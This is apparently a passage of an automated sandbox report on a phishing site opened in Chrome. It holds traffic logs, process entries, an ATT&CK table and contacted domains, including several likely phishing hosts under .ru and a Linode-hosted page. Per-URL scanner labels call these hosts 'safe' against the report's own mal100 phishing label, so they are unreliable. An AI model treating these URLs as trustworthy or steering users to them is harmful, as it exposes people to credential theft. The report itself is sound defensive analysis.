                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.86.251.28:443 -> 192.168.2.18:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49873 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49874 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49877 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49880 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49882 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49884 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49886 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49910 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49912 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49934 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49945 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49947 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49953 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49956 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:49965 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50003 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50004 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50005 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50006 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50007 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.18:50008 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50011 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50010 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.235.23:443 -> 192.168.2.18:50016 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.235.23:443 -> 192.168.2.18:50017 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.186.235.23:443 -> 192.168.2.18:50018 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.18:50040 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50050 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50052 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50051 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50053 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.117.152.135:443 -> 192.168.2.18:50054 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.120.195.249:443 -> 192.168.2.18:50055 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.175.175.74:443 -> 192.168.2.18:50060 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 34.225.45.182:443 -> 192.168.2.18:50065 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.86.181.185:443 -> 192.168.2.18:50070 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 130.211.5.208:443 -> 192.168.2.18:50072 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.86.181.185:443 -> 192.168.2.18:50077 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.156.36:443 -> 192.168.2.18:50094 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.156.36:443 -> 192.168.2.18:50095 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.235.36.35:443 -> 192.168.2.18:50100 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.235.36.35:443 -> 192.168.2.18:50101 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50103 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50104 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.18:50107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.18:50114 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.18:50119 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50124 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.18:50127 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.158.246:443 -> 192.168.2.18:50128 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50140 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50141 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50139 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.18:50138 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.18:50148 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.18:50149 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.18:50174 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.18:50173 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6512_1295690873
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6512_1295690873
                Source: classification engineClassification label: mal100.phis.evad.win@22/91@74/176
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12619626058332868800,6865025498761926618,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,12619626058332868800,6865025498761926618,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 3.26.d.script.csv, type: HTML
                Source: Yara matchFile source: 4.37..script.csv, type: HTML
                Source: Yara matchFile source: 4.38..script.csv, type: HTML
                Source: Yara matchFile source: 4.6.pages.csv, type: HTML
                Source: Yara matchFile source: 4.5.pages.csv, type: HTML
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Browser Extensions
                1
                Process Injection
                12
                Masquerading
                OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting
                1
                Extra Window Memory Injection
                1
                Process Injection
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                File Deletion
                NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                Ingress Tool Transfer
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Extra Window Memory Injection
                LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                https://mixpanel.com/p/FWfQuhi1aNTS16WPXLxRfi0%Avira URL Cloudsafe
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mi&oit=1&cp=2&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE0%Avira URL Cloudsafe
                https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mix&oit=1&cp=3&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE0%Avira URL Cloudsafe
                https://o81318.ingest.us.sentry.io/api/4508649566830592/envelope/?sentry_version=7&sentry_key=8da60ce5d69f3663b76685b5a017bfd4&sentry_client=sentry.javascript.react%2F8.50.00%Avira URL Cloudsafe
                https://api.sprig.com/sdk/1/environments/9sZai6GO-WSS/config0%Avira URL Cloudsafe
                https://api.honeycomb.io/v1/traces0%Avira URL Cloudsafe
                https://automotorespascualito.com/hpp/index.php0%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/favicon.ico0%Avira URL Cloudsafe
                https://kwzh.kdyukk.ru/machlo$agpzrfcb0%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/ozq0UiZHd9C8b8YcCD8tmcoe1yeU2NWau1c7Os7o0%Avira URL Cloudsafe
                https://prudn87837498798487434.us-lax-1.linodeobjects.com/900pppejdedr.html0%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/wx4JzFCVEPK2a4BmjUySfrZrcstE1RfsssMSRW121270%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/rs1tEVctIEvVMForyhoqljWxFNIghHfWamSauodo7dwGpwh40leoQqcylchef1930%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/rqmMm82swDD0R4oJbc7jZ02XcJruly8cwZzt5zjAsfw0%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/qrkq6tjIc3r5nBX8S7OdUDvbneJNdxGQmnJ7dx0HaqNlcmCbG671400%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/mnEMzb8jUNnKVyAT3k5kL57E6Hgba7eIuvr3UyuGz2C3Jh6U06zE3781470%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/opTZQRdFZXI9raOJwdpsyGfsdyKJ2TK5PdTfLOBJSR9iV5IPstBSa36UESJdcDFjfpdeY2Hne2mI0PwYCVcd2400%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/ijy2fRQQJuz4z04afoy15ExbmbUYT6xx10nJD7vmnUY6HNJ3QW1gCt7rwnOgycX0cZOI7rFef2050%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/stIrN6fgetKZ2pEHJbr5ECSIda45Rwn0FB9toxb2HlSxdtTGNoGturGef2510%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/34RyVvuzJYx0eebApfCjIz8yUE5ijn9sGqnQAmC671030%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/xyEzOlhUCiierszzc4ef280%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/12aNaBkhbtQKolWIvxydkeYP89150%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/klBiF5nBFGI9ZBA6VNTLBYDtbLEUH4xH2WD565XSQVInIrw2Ga7S5GyD4TQujTVYuv2130%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/wx15xRgFt39795h1KKeDjVzWpWO0OrsbkvAK4y71EU515ot901760%Avira URL Cloudsafe
                https://zyvk.fgaiuin.ru/apP1I1v3t06SAbzw9mvtIB0Mq1bYC8AwtydbW1CC5CJBgYfG4rBstbLOiHPj80%Avira URL Cloudsafe
                https://a.nel.cloudflare.com/report/v4?s=K0hGeEE3BqHQG%2FLW4BDHgq4XatkjykvpVSj6vszsoPvdsun6e7No4pk4eMBMRCbnhOWpVknjKHA9krtPuKAjIv%2FiVbxc1AGaHbqkDdQlyNqgfUjd1I%2BfwoGJZcbl0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  api.sprig.com
                  52.86.181.185
                  truefalse
                    high
                    github.com
                    140.82.112.3
                    truefalse
                      high
                      us-lax-1.linodeobjects.com.akadns.net
                      172.235.36.35
                      truefalse
                        unknown
                        beacons2.gvt2.com
                        34.128.8.163
                        truefalse
                          high
                          o81318.ingest.us.sentry.io
                          34.120.195.249
                          truefalse
                            unknown
                            beacons.gvt2.com
                            142.250.113.94
                            truefalse
                              high
                              mixpanel.com
                              34.117.152.135
                              truefalse
                                unknown
                                code.jquery.com
                                151.101.130.137
                                truefalse
                                  high
                                  automotorespascualito.com
                                  192.185.156.36
                                  truefalse
                                    unknown
                                    zyvk.fgaiuin.ru
                                    172.67.158.246
                                    truetrue
                                      unknown
                                      kwzh.kdyukk.ru
                                      104.21.84.180
                                      truefalse
                                        unknown
                                        cdnjs.cloudflare.com
                                        104.17.25.14
                                        truefalse
                                          high
                                          gce-beacons.gcp.gvt2.com
                                          35.186.229.172
                                          truefalse
                                            high
                                            www.google.com
                                            142.250.64.68
                                            truefalse
                                              high
                                              cdn.mxpnl.com
